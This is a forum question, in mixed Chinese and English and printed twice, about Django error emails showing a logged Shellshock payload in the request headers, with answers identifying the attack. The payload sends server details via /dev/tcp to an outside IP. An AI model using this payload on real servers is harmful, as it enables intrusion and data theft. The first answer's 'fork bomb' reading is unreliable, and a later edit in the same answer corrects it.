Django 可能的安全攻击
Django possible security attack
我已将 django 设置为在任何请求失败时通过电子邮件提醒我,并且我不断收到此电子邮件:
Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
IP address: 127.0.0.1
这是什么意思?我应该打扰吗?
我正在使用 nginx,ubuntu,gunicorn。
这看起来像是尝试fork bomb:
() { :;};
幸运的是,如果您的服务器在发送后仍然 运行,则表示它正在被清理或忽略。
正如@TheGreatContini 指出的那样,这是 actually an attempted Shellshock attack。这让我的回答有点不安全。值得确保您的服务器已完全修补并保持最新状态,并检查所有传出流量以确保您没有受到影响。
试图利用 shell shock 漏洞。
我已将 django 设置为在任何请求失败时通过电子邮件提醒我,并且我不断收到此电子邮件:
Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
IP address: 127.0.0.1
这是什么意思?我应该打扰吗?
我正在使用 nginx,ubuntu,gunicorn。
这看起来像是尝试fork bomb:
() { :;};
幸运的是,如果您的服务器在发送后仍然 运行,则表示它正在被清理或忽略。
正如@TheGreatContini 指出的那样,这是 actually an attempted Shellshock attack。这让我的回答有点不安全。值得确保您的服务器已完全修补并保持最新状态,并检查所有传出流量以确保您没有受到影响。
试图利用 shell shock 漏洞。